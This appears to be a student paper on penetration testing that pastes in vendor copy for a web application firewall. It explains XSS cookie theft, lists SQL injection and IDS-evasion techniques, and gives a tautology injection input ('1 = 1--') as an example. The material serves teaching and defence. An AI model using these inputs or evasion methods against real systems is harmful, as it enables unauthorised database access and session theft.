Attackers intending to exploit cross-site scripting vulnerabilities must approach each class of vulnerability differently. For each class, a specific attack vector is described here. The names below are technical terms, taken from the cast of characters commonly used in computer security. Reflect XSS: 1.Alice often visits a particular website, which is hosted by Bob. Bob's website allows Alice to log in with a username/password pair and stores sensitive data, such as billing information. 2. Mallory observes that Bob's website contains a reflected XSS vulnerability. 3. Mallory crafts a URL to exploit the vulnerability, and sends Alice an email, enticing her to click on a link for the URL under false pretenses. This URL will point to Bob's website (either directly or through an iframe or Ajax call), but will contain Mallory's malicious code, which the website will reflect. 4. Alice visits the URL provided by Mallory while logged into Bob's website. 5. The malicious script embedded in the URL executes in Alice's browser, as if it came directly from Bob's server (this is the actual XSS vulnerability). The script can be used to send Alice's session cookie to Mallory. Mallory can then use the session cookie to steal sensitive information available to Alice (authentication credentials, billing info, etc.) without Alice's knowledge. Stored XSS: 1.Mallory posts a message with malicious payload to a social network. When Bob reads the message, Mallory's XSS steals Bob's cookie. Mallory can now hijack Bob's session and impersonate Bob

Cookie Security
Other imperfect methods for cross-site scripting mitigation are also commonly used. One example is the use of additional security controls when handling cookie-based user authentication. Many web applications rely on session cookies for authentication between individual HTTP requests, and because client-side scripts generally have access to these cookies, simple XSS exploits can steal these cookies. To mitigate this particular threat (though not the XSS problem in general), many web applications tie session cookies to the IP address of the user who originally logged in, and only permit that IP to use that cookie. This is effective in most situations (if an attacker is only after the cookie), but obviously breaks down in situations where an attacker spoofs their IP address, is behind the same NATed IP address or web proxyor simply opts to tamper with the site or steal data through the injected script, instead of attempting to hijack the cookie for future use.

Safely Validating Untrusted HTML input

Many operators of particular web applications (e.g. forums and webmail) wish to allow users to utilize some of the features HTML provides, such as a limited subset of HTML markup. When accepting HTML input from users (say, <b>very</b> large), output encoding (such as &lt;b&gt;very&lt;/b&gt; large) will not suffice since the user input needs to be rendered as HTML by the browser (so it shows as "very large", instead of "<b>very</b> large"). To stop XSS when accepting HTML input from users is much more complex in this situation. Untrusted HTML input must be run through an HTML policy engine to ensure that it does not contain XSS.

How to prevent XSS:


Preventing XSS requires keeping un-trusted data separate from active browser content. 1. The preferred option is to properly escape all un-trusted data based on the HTML context (body, attribute, JavaScript, CSS, or URL) that the data will be placed into. Developers need to include this escaping in their applications unless their UI framework does this for them. 2. Positive or white list input validation with appropriate canonicalization (decoding) also helps protect against XSS, but is not a complete defense as many applications require special characters in their input. Such validation should, as much as possible, decode any encoded input, and then validate the length, characters, format, and any business rules on that data before accepting the input.

Risks Associated with Cross-Site Scripting


Attackers are lured to XSS exploits because how easy they are to perform, but they also know to follow the money. Attacking a web site through a cross-site scripting vulnerability can be quite profitable for the attacker who knows how to harness this type of exploit. Without proactive Web application security in place to stop XSS attacks, you leave your site vulnerable to:

User accounts being stolen through session hijacking (stealing cookies) or through the theft of username and password combinations The ability for attackers to track your visitors web browsing behavior infringing on their privacy Abuse of credentials and trust Keystroke logging of your sites visitors Misuse of server and bandwidth resources The ability for attackers to exploit your visitors browser Data theft Web site defacement and vandalism Link injections Content theft

Web sites that have been exploited using XSS attacks have also been used to:

Probe the rest of the intranet for other vulnerabilities Launch Denial of Service attacks Launch Brute Force attacks

Preventing Cross-Site Scripting Attacks


With dotDefender web application firewall you can avoid XSS attacks because dotDefender inspects your HTTP traffic and determines if your web site suffers from cross-site scripting vulnerabilities or other attacks to stop web applications from being exploited.

Architected as plug & play software, dotDefender provides optimal out-of-the-box protection against cross-site scripting, SQL Injection attacks, path traversal and many other web attack techniques. The reasons dotDefender offers such a comprehensive solution to your web application security needs are:

Easy installation on Apache and IIS servers Strong security against known and emerging hacking attacks Best-of-breed predefined security rules for instant protection Interface and API for managing multiple servers with ease Requires no additional hardware, and easily scales with your business

How does an attacker exploit a cross-site scripting vulnerability?


Before a web site can be compromised, an attacker needs to find applications that are vulnerable to XSS vulnerabilities. Unfortunately, most web applications, both Free/Open Source Software and commercial software, are susceptible. Attackers simply perform a Google search for terms that are often found in the software. Using search bots to automate this process means an attacker can find thousands of vulnerable web sites in minutes. Once a vulnerable web site is discovered, the attacker then examines the HTML to find where the exploit code can be injected.

Coding the exploit


After this has been determined, the attacker then begins to code the exploit. There are three types of attacks that can be used: 1. Stored (persistent) attacks: Injected malicious code is stored on a target server such as a bulletin board, a visitor log, or a comment field. When interacting with the target server, an end-user inadvertently retrieves and executes the malicious code from the server. 2. Reflected attacks: The end-user is tricked into clicking a malicious link or submitting a manipulated form. The injected code is sent to a vulnerable web server that directs the cross-site attack back to the users browser. The browser then executes the malicious code, assuming it comes from a trusted server. 3. DOM-based attacks: The attack script is based on the same page's DOM (document object model), enabling it to manipulate and interrogate it. In this type of exploit, remote execution is enabled allowing the attacker to execute malicious code on the victim's computer. After the code has been written, it is then injected into the target site.

Reap the rewards


Now that the script has been injected into the vulnerable site, the attacker can now begin to reap the rewards. If the intent of the XSS attack was to steal user authentication credentials, usernames and passwords are now collected. For attacks that center around keystroke logging, the attacker will begin to receive the logged results from the victims. If the intent was to inject spam links into a well trusted site, then the attacker will begin to see increased activity on their sites due to higher traffic and higher search engine results.

If the attack was successful, the attacker will often replicate it on other sites to increase the potential reward.

The Need to Avoid Cross-Site Scripting Attacks


Cross-site scripting not only costs businesses in stolen data, but also by harming their reputation. Owners who work hard to build themselves as trusted site to deliver content, services, or products often find themselves hurt when loyal visitors lose trust in them after an attack. Visitors whose data is stolen or find their computers infected as the result of an innocent visit to your web site are hesitant to return even if assurances are made that the site is now clean. Even if a vulnerable site is fixed, sites that contained malicious code from an XSS exploit are usually flagged by Google and other search engines as a result. Resources spent in time and effort to restore a solid reputation with the search engines is an added cost that most web site owners never figure on. The threat posed by cross-site scripting attacks is not solitary. Combined with other vulnerabilities like SQL injections, path traversal, denial of service attacks, and buffer overflows the need for web site owners and administrators to be vigilant is not only important but overwhelming.

Protect Yourself from Cross-Site Scripting Attacks


dotDefender's unique security approach eliminates the need to learn the specific threats that exist on each web application. The software that runs dotDefender focuses on analyzing the request and the impact it has on the application. Effective web application security is based on three powerful web application security engines: Pattern Recognition, Session Protection and Signature Knowledgebase. The Pattern Recognition web application security engine employed by dotDefender effectively protects against malicious behavior such as SQL Injection and Cross Site Scripting. The patterns are regular expression-based and designed to efficiently and accurately identify a wide array of application-level attack methods. As a result, dotDefender is characterized by an extremely low false positive rate. What sets dotDefender apart is that it offers comprehensive protection against cross-site scripting and other attacks while being one of the easiest solutions to use. In just 10 clicks, a web administrator with no security training can have dotDefender up and running. Its predefined rule set offers out-of-the box protection that can be easily managed through a browser-based interface with virtually no impact on your server or web sites performance.

Prevent SQL Injection Attacks


What makes the threat of SQL injection attacks so dangerous is the ease in which they can be launched and how many web sites are vulnerable to them. Attackers often use large botnets to systematically seek out vulnerable web sites to attack with little work being done on their part. Pair this with the fact that the number of sites vulnerable to this type of attack grows each year and it is clear to see why it remains at the top of the most critical vulnerabilities.

Risks Associated with SQL Injection


Even with the ease that an automated SQL injection attack can be carried out, if the attackers stood to gain nothing this threat would soon disappear. Unfortunately, those who successfully compromise vulnerable web sites can find that this vulnerability can be quite profitable as they give the attacker access to the database so information can be sold or data can be deleted. More advanced techniques can also be used to give the attacker unrestricted access to the system through a backdoor. SQL injection can also be used in tandem with other exploits, such as cross-site scripting, to manipulate how data is displayed to a web sites visitors. Not preventing SQL Injection attacks leaves your business at great risk of:

Changes to or deletion of highly sensitive business information. Steal customer information such as social security numbers, addresses, and credit card numbers. Financial losses Brand damage Theft of intellectual property Legal liability and fines

How does an attacker compromise your SQL server?


Before a web site can be compromised, an attacker needs to find applications that are vulnerable to SQL injection using queries to learn the SQL application methods and its response mechanisms. The attacker has two ways to identify SQL injection vulnerabilities: 1. Error messages: the attacker constructs the correct SQL syntax based on errors messages propagated from the SQL server via the front-end web application. Using the errors received, the hacker learns the internal SQL database structure and how to attack by injecting SQL queries via the Web application parameters. 2. Blindfolded Injection: this technique is utilized by hackers in situations where no error messages or response content is returned from the database. In these cases, the attacker lacks the ability to learn the backend SQL queries in order to balance the SQL injection query. In the lack of database content output within the Web application, the attacker is also challenged with finding a new way of retrieving the data.

Identifying the database


When the attacker knows how each database is reacting he or she can identify the database type and the server that is running it. There are several techniques the attacker uses to identify database objects in a SQL statement. 1. Using a concatenation string: select f1+f2 from t1 2. Using a semicolon or cash sign ($)

Compromising the SQL server


Once the attacker has all information he can build the exploit code. Some techniques used to execute SQL Injection attacks are:

Terminating queries using quotes, double-quotes, SQL comments Using stored procedures Database manipulation commands such as TRUNCATE, DROP Using CASE WHEN, EXEC to run nested queries Utilizing SQL injection to create Buffer Overflow attacks within the database server Delivering SQL queries via XML and Web Services Blindfolded SQL Injection techniques: o Blindfolded injection techniques using Boolean queries and WAITFOR DELAY o Comparison queries using commands such as BETWEEN, LIKE, ISNULL IDS signature evasive SQL Injection techniques: o Using CONVERT & CAST commands to mask the attack payload Using Null bytes to break the signature pattern o Using HEX encoding mixtures o Using SQL CHAR() to represent ASCII values as numbers

For example, the attacker decides to go with a basic attack using: 1 = 1-What happens when this is entered into an input box is that the server recognizes 1 = 1 as a true statement. Since -- is used for commenting, everything after that is ignored making it possible for the attacker to gain access to the database. You can see precisely how this attack works on our SQL injection example page.

The Need to Avoid SQL Injection Attacks


SQL injection techniques have been around for over 10 years now, but recent years have seen a dramatic increase in both number of attacks and the extent of damage caused by them. In fact, a sweep of attacks in the second quarter of 2008 alone resulted in over 500,000 exploited web pages that were compromised to deliver password-stealing malware to users' computers. In more recent studies, security firms report attempted attacks reaching totals of 450,000 per day. The tragedy is that these threats can be mitigated, or even prevented, with the proper tools and knowledge. The attacker identifies vulnerabilities and obtains database access SQL (Structured Query Language) provides an interface to facilitate access to and interaction with a database. A database usually stores data in tables and procedures. SQL Injection is a security exploit method in which the attacker aims at penetrating a back-end database to manipulate, steal or modify information in the database. The SQL Injection attack method exploits the Web application by injecting malicious queries, causing the manipulation of data. Almost all SQL databases and programming languages are potentially vulnerable and over 60% of websites turn out to be vulnerable to SQL Injection.

The threat posed by SQL injection attacks are not solitary. Combined with other vulnerabilities like crosssite scripting, path traversal, denial of service attacks, and buffer overflows the need for web site owners and administrators to be vigilant is not only important but overwhelming.

CHAPTER 4 Result and Analysis

4.1 Analysis and Result

Analysis and Result


After conduction all the tasks above, the next task ahead is to generate a report for the organization. The report should start with an overview of the penetration testing process done. This should be followed by an analysis and commentary on critical vulnerabilities that exist in the network or systems. Vital vulnerabilities are addressed first to highlight it to the organization. Less vital vulnerabilities should then be highlighted. The reason for separating the vital vulnerabilities from the less vital ones helps the organization in decision making. For example, organizations might accept the risk incurred from the less vital vulnerabilities and only address to fix the more vital ones. The other contents of the report should be as follows: Summary of any successful penetration scenarios Detailed listing of all information gathered during penetration testing Detailed listing of all vulnerabilities found Description of all vulnerabilities found Suggestions and techniques to resolve vulnerabilities found

Cleaning Up
The cleaning up process is done to clear any mess that has been made as a result of the penetration test. A detailed and exact list of all actions performed during the penetration test must be kept. This is vital so that any cleaning up of the system can be done. The cleaning up of compromised hosts must be done securely as well as not affecting the organizations normal operations. The cleaning up process should be verified by the organizations staff to ensure that it has been done successfully. Bad practices and improperly documented actions during penetration test will result in the cleaning up process being left as a backup and restore job for the organization thus affecting normal operations and taking up its IT resources.A good example of a clean up process is the removal of user accounts on a system previously created externally as a result of the penetration test. It is always the penetration testers responsibility to inform the organization about the changes that exists in the system as a result of the penetration test and also to clean up this mess.

Limitations of Penetration Testing


There are many security problems for which penetration tests will not be able to identify. Penetration tests are generally carried out as "black box" exercises, where the penetration tester does not have complete information about the system being tested. A test may not identify a vulnerability that is obvious to anyone with access to internal information about the machine. A penetration test can only identify those problems that it is designed to look for. If a service is not tested then there will be no information about its security or insecurity. A penetration test is unlikely to provide information about new vulnerabilities, especially those discovered after the test is carried out.

Even if the penetration team did not manage to break into the organization this does not mean that they are secure. Penetration testing is not the best way to find all vulnerabilities. Vulnerability assessments that include careful diagnostic reviews of all servers and network devices will definitely identify more issues faster than a "black box" penetration test. Penetration tests are conducted in a limited time period. This means that it is a "snapshot of a system or network's security. As such, testing is limited to known vulnerabilities and the current configuration of the network. Just because the penetration test was unsuccessful today does not mean a new weakness will not be posted on Bugtraq and exploited in the near future. Also it does not mean that if the testing team did not discover the any vulnerability in the organizations system, it does not mean that hackers or intruders will not. As business has transformed over the years to a more service-oriented environment, a significant increase in trust has been placed on outside organizations to manage business processes and corporate data. Do you truly know how secure your third party service providers networks and / or web applications are? What about your own network or web applications? Data breaches are occurring at an all-time high. Network securitys increased awareness at the C level is also helping IT departments to increase their budgets and move to their requests to the top of every corporations annual budget. The need for accessible on-demand data used in real time decision making and increased focus on business efficiencies has resulted in vital / confidential data being accessible, stored, and transferred electronically across corporate networks and the internet. Attempted breaches occur every day through the use of automated bots and targeted attacks, but without proper testing, how do you know if your business or a third party service provider of yours is susceptible to attack?

Properly Monitor Network and Application Security


There are a number of common failures that an unseemingly high number of IT departments fall victim to which leave their organizations at risk for intrusion:

Delays in patching security flaws of operating systems and software; Use of unsecure access protocols; Lapses in licensing for antivirus, IDS, IPS, and other vulnerability identification and prevention tools; Weak passwords for firewalls and other exposed services; A loose software management policy; Weak secure coding guidelines and QA review processes; and Lapses in IT Managements adherence to security controls and protocols.

All of these issues are preventable by ensuring a proper security maintenance program with sufficient resources dedicated to its execution is in place. A regularly scheduled external and / or internal vulnerability assessment can serve to validate operation of current security practices and identify new issues that may have been introduced as a result of an upgrade or system change.

Regulatory Compliance
Software as a Services (SaaS) offerings, application service providers, 3rd party colocation / hosting facilities, and especially corporate networks, have become prime targets for hackers, and the number of incidents increasing yearly, as they are treasure troves for confidential and business data that are targeted by criminals. This has elevated the importance of IT Security in the enterprise and within various compliance and regulatory frameworks.

Recognized frameworks include, at minimum, requirements that a regular vulnerability assessment of either the production network and / or web application be performed. Depending upon your environment the following frameworks potentially required these assessments:

Sarbanes-Oxley (SOX); Statements on Standards for Attestation Engagements 16 (SSAE 16 / SOC 1); Service Organization Controls (SOC) 2 / 3; Payment Card Industry Data Security Standard (PCI DSS); Health Insurance Portability and Accountability Act (HIPAA); Gramm Leach Bliley Compliance (GLBA); and Federal Information System Controls Audit Manual (FISCAM).

Commonly Identified Risks


Inappropriate SSL Certificate (expired, not properly configured, self-signed, etc.); Unknown or unnecessarily open shares; Dormant user accounts that have not expired; Unnecessary open ports; Rogue devices connected to your systems; Dangerous script configurations; Servers allowing use of dangerous protocols; Incorrect permissions on important system files; Running of unnecessary, potentially dangerous services; Default passwords in use; and Unpatched services / applications.

Cyber Security Risk Management Preparedness


The US-CERT (Computer Emergency Readiness Team) Recommends CEOs and Business Owners to ask themselves the following questions regarding their readiness to defend against and recover from a cyber-attack:

How Is Our Executive Leadership Informed About the Current Level and Business Impact of Cyber Risks to Our Company? What Is the Current Level and Business Impact of Cyber Risks to Our Company? What Is Our Plan to Address Identified Risks? How Does Our Cyber Security Program Apply Industry Standards and Best Practices? How Many and What Types of Cyber Incidents Do We Detect In a Normal Week? What is the Threshold for Notifying Our Executive Leadership? How Comprehensive Is Our Cyber Incident Response Plan? How Often Is It Tested?

Penetration testing is an important part of a companys defence against cyber attacks. Penetration testing may be referred to as ethical hacking. It is a means to check systems, buildings and people are secure by simulating criminal attacks. Penetration testing should reflect a measured approach to risk. Think of things from a criminals point of view. How much time, effort and money would criminals invest to gain access to your assets? How much time, effort and money are YOU willing to invest to ensure they cant?

Successful cyber attacks result in brand damage, financial loss and recovery costs. It is important to ensure your organization is, and remains resilient to such attacks.

It is helpful to take an asset-centric point of view, and focus on defending the assets or data that matter most to your company. Usually Pentesters take the following approach:

Scoping where are your assets, what are they and whom can access them? Gap Analysis what are the strengths and weaknesses in your organisation? Risk Assessment how likely are your gaps to become targets? Penetration Test Scoping what test plan, when executed, will give your company assurance that systems are secure? Remediation following a test, how are issues addressed? Improvement - what policies and processes can be fixed so issues do not recur?

A good penetration testing firm will be able to guide you through this and ensure you select the right balance to cost, risk and security. There is nothing worse than undergoing year on year penetration testing, only to find the same issues. Pen testers want to see our clients develop and improve their security postures, and not to remain targets.

Physical Penetration Testing why do we need to do it?


In the current climate of business insecurity, there are significant risks for business who suffer from security breaches as many and may cause significant loss of or damage to;

Physical assets People Brand Reputation and Profits

It is not difficult to see a business being brought to its knees by what appears to be an innocuous theft or other lapse in security. It is crucial that businesses put good holistic security measures in place. They

should include physical, Personnel and Information security measures. However for them to be effective they should be regularly tested to ensure they are appropriate and proportionate to the threat. Independent Commercial Physical Penetration Tests are an ideal means of checking that the security measures work as intended.

Reputational Analysis
The most secure infrastructures in the world are still subject to the threat of deliberate or negligent human activity, and whilst human error can never be truly eliminated, your resilience against intelligence gathering activities can be measured through a social engineering assessment, which typically includes: a. Using telephony systems to gain potentially sensitive information from employees. b. Using social media sites to gain employee trust. c. Posing as a customer, senior manager or trusted third party to glean information. Furthermore, a degree of sensitive information may also be available on publicly available websites (a very high level example being Google), attacks may be being planned against you via IRC channels and employees may be breaching confidentiality clauses through knowingly or unknowingly releasing sensitive information about your company. Source Code Review is an essential part of best practice software security and also compliance regulations, such as PCI DSS and PA DSS. It also helps to eliminate serious software flaws that might lead to instability or affect the integrity of data. We should provide both static and dynamic testing of source code, to ensure applications offer a high level of protection of confidential data and meet ever stricter compliance requirements. your code complies with OWASP top 10, and is not prone to:

Unvalidated input Broken access control (for example, malicious use of user IDs) Broken authentication and session management (use of account credentials and session cookies) Cross-site scripting (XSS) attacks Buffer overflows Injection flaws (for example, structured query language (SQL) injection) Improper error handling Insecure storage Denial of service Insecure configuration management

a) Eliminate the risk of SQL Injection, XSS and CSRF style attacks b) Analyse millions of lines of code across multiple modules c) Interpret security flaws in a a wide range of languages, including C and its derivatives, asp, asp.net, Visual Basic, vb.net, C#, Java, Perl, Python, PHP and Delphi. d) Pinpoint vulnerabilities and provide precise, detailed remediation advice for rapid fixes e) Identify design areas and recommend best practice f) Advise on counter measures such as Web Application Firewalls

SDLC Assessment and Security Training for Developers


Pentesters should advise on industry standards and best practices to help you build security into each phase, including:

Secure Software Concepts security implications in software development and for software supply chain integrity Secure Software Requirements capturing security requirements in the requirements gathering phase Secure Software Design translating security requirements into application design elements Secure Software Implementation/Coding unit testing for security functionality and resiliency to attack, and developing secure code and exploit mitigation Secure Software Testing testing for security functionality and resiliency to attack Software Acceptance security implication in the software acceptance phase Software Deployment, Operations, Maintenance and Disposal security issues around steady state operations and management of software

The review is aimed at all software lifecycle stakeholders, and provides:


A holistic approach to software security needs Advice regarding designing, developing and deploying secure software Knowledge on the latest software security technologies Assurance of compliance to regulations Compliance to your policy & procedures set

Confidentiality, integrity, availability, authentication, authorization and auditing the core tenets of security must become requirements in your Software Development Lifecycle. Without this level of commitment, information is placed at risk. Incorporating security early and maintaining it throughout all the different phases of the Software Development Lifecycle has proven to be 30-100 times less expensive and incalculably more effective than the release and patch methodology used frequently today.

CHAPTER 5 CONCLUSION

5.1 Conclusion of Analysis for Penetration Testing 5.1 CONCLUSION


Penetration testing is a comprehensive method to identify the vulnerabilities in a system. It offers benefits such as prevention of financial loss; compliance to industry regulators, customers and shareholders; preserving corporate image; proactive elimination of identified risks. The testers can choose from black box, white box, and gray box testing depending on the amount of information available to the user. The testers can also choose from internal and external testing, depending on the specific objectives to be achieved. There are three types of penetration testing: network, application and social engineering. This paper describes a three-phase methodology consisting of test preparation, test, and test analysis phase. The test phase is done in three steps: information gathering, vulnerability analysis, and vulnerability exploit. This phase can be done manually or using automated tools. This penetration testing process was illustrated on the web applications. The testers should follow a comprehensive format to present the test results. One of the most important parts of the test analysis phase is the preparation of remediation which includes all necessary corrective measures for the identified vulnerabilities. The final report needs to have enough detail and substance to allow those doing remediation to simulate and follow the attack pattern and respective findings. One of the crucial factors in the success of a pen-test is the underlying methodology. Lack of a formal methodology means no consistency, and the client wouldnt want to be paying and watching the testers testing clueless. While a penetration tester's skills need to be specialized for the job, the approach shouldn't be. In other words, a formal methodology should provide a disciplined framework for conducting a complete and accurate penetration test, but need not be restrictive - it should allow the tester to fully explore his/her intuitions. A penetration test is useless without a well-implemented security policy. In order for the testing service to bring conformity between penetration testers and clients of the penetration test, a penetration testing policy was suggested in this research. Methodology makes the testing service more effective, while Policy will reduce financial and confidential disparities between the two parties of the testing service. Penetration testing is essential given the context of high operational risk in the financial services industry. Web-based and internal applications should be fully tested to ensure they do not provide an avenue of entry for attackers. Vulnerability management should be considered a priority given the sophisticated malware targeting client PCs inside the organization. Wireless vulnerabilities also add to the attack surface that can be exploited. Penetration testing is the only legitimate means to identify residual risk that remains after code has been tested and operational and other threats have been minimized. To make the most of penetration testing it is necessary to prioritize the effort. The penetration test should be scoped properly and should take advantage of the knowledge that the client organization has regarding exposures within their enterprise. And this information should be combined with the experience and insight of the penetration testing company. As stated initially, the goal of penetration testing is to compromise a target system and ultimately steal information. Penetration testing is focused on finding security vulnerabilities in a target environment that could let an attacker penetrate the network or computer systems. A collaborative approach is recommended whereby the financial services organization and the penetration testing organization work togetherto more efficiently identify which exploits can be leveraged to steal information.

Organizations that bear network security risk should engage in an ongoing vulnerability management program. A vulnerability management program includes ongoing vulnerability assessments, ongoing vulnerability remediation, and risk measurements. When the vulnerability management program measurements provide a given level of confidence, it is then time to test the security assertions and perform a penetration test. An organization should only engage in a penetration test once they are confident that what they want tested is secure. If your organization does not include a vulnerability management program, there is no sense in taking a test. Before the student takes a test, the student must prepare. The great Master Kan once said to his student: "When you can take the pebble from my hand, it will be time for you to leave". Similarly, when the Vulnerability Management program measurements indicate that one is secure, it is time for the test. REFERENCES [1] McGraw, G. (2006). Software Security: Building Security In, Adison Wesley Professional. [2] The Canadian Institute of Chartered Accountants Information Technology Advisory Committee, (2003) Using an Ethical hacking Technique to Assess Information Security Risk, Toronto Canada. http://www.cica.ca/research-and-guidance/documents/it-advisory-committee/item12038.pdf, accessed on Nov. 23, 2011. [3] Mohanty, D. Demystifying Penetration Testing HackingSpirits, http://www.infosecwriters.com/text_resources/pdf/pen_test2.pdf, accessed on Nov. 23, 2011. [4] Penetraion Testing Guide, http://www.penetration-testing.com/ [5] iVolution Security Technologies, Benefits of Penetration Testing, http://www.ivolutionsecurity.com/pen_testing/benefits.php, accessed on Nov. 23, 2011. [6] Shewmaker, J. (2008). Introduction to Penetration Testing, http://www.dts.ca.gov/pdf/news_events/SANS_InstituteIntroduction_to_Network_Penetration_Testing.pdf, accessed on Nov. 23, 2011. [7] Application Penetration Testing, https://www.trustwave.com/apppentest.php, accessed on Nov. 23, 2011. [8] Mullins, M. (2005) Choose the Best Penetration Testing Method for your Company, http://www.techrepublic.com/article/choose-the-best-penetration-testing-method-for-yourcompany/ 5755555, accessed on Nov. 23, 2011. [9] Saindane, M. Penetration Testing A Systematic Approach, http://www.infosecwriters.com/text_resources/pdf/PenTest_MSaindane.pdf, accessed on Nov. 23, 2011. [10] Nmap Free Security Scanner for Network Explorer, http://nmap.org/, accessed on Nov. 23, 2011. [11] Sanfilippo, S. Hping Active Network Security Tool, http://www.hping.org/, accessed on Nov. 23, 2011. [12] Superscan, http://www.mcafee.com/us/downloads/free-tools/superscan.aspx, accessed on Nov. 23, 2011. [13] Xprobe2, http://www.net-security.org/software.php?id=231, accessed on Nov. 23, 2011. International Journal of Network Security & Its Applications (IJNSA), Vol.3, No.6, November 2011 38 [14] P0f, http://www.net-security.org/software.php?id=164, accessed on Nov. 23, 2011. [15] Httprint, http://net-square.com/httprint/, accessed on Nov. 23, 2011. [16] Nessus, http://www.tenable.com/products/nessus, accessed on Nov. 23, 2011. [17] Shadow Security Scanner, http://www.safety-lab.com/en/download.htm, accessed on Nov. 23, 2011. [18] Iss Scanner, http://shareme.com/showtop/freeware/iss-scanner.html, accessed on Nov. 23, 2011. [19] GFI LAN guard, http://www.gfi.com/network-security-vulnerability-scanner, accessed on Nov. 23, 2011. [20] Brutus, http://download.cnet.com/Brutus/3000-2344_4-10455770.html, accessed on Nov. 23, 2011. [21] MetaSploit, http://www.metasploit.com/, accessed on Nov. 23, 2011.

[22] Skoudis, E. Powerful Payloads: The Evolution of Exploit Frameworks, (2005). http://searchsecurity.techtarget.com/news/1135581/Powerful-payloads-The-evolution-ofexploitframeworks, accessed on Nov. 23, 2011. [23] Andreu, A. (2006). Professional Pen Testing for Web Applications. Wrox publisher, 1st edition. [24] OWASP. Web Application Penetration Testing, http://www.owasp.org/index.php/Web_Application_Penetration_Testing, accessed on Nov. 23, 2011. [25] Fiddler, http://www.fiddler2.com/fiddler2, accessed on Nov. 23, 2011. [26] Stuttard, D. and Pinto, M. (2008) The Web Application Hacker's Handbook: Discovering and Exploiting Security Flaws,, Wiley. 1st edition. [27] White Paper on Penetration Testing, http://www.docstoc.com/docs/70280500/White-Paper-onPenetration-Testing, accessed on Nov. 23, 2011. [28] Neumann, P. (1977) Computer System Security Evaluation, Proceedings of AFIPS 1977 Natl. Computer Conf., Vol. 46, pp. 1087-1095. [29] Pfleeger, C. P., Pfleeger, S. L., and Theofanos, M. F. (1989) A Methodology for Penetration Testing, Computers &Security, 8(1989) pp. 613-620. [30] Bishop, M. (2007) About Penetration Testing, IEEE Security & Privacy, November/December 2007, pp. 84-87. [31] Arkin, B., Stender, S., and McGraw, G. Software Penetration Testing, IEEE Security & Privacy, January/Feburary 2005, pp. 32-35. [32] http://resources.infosecinstitute.com/nmap/ [33] http://pwcrack.com.penetration.shtml [34] http://eternasecurity.com

You might also like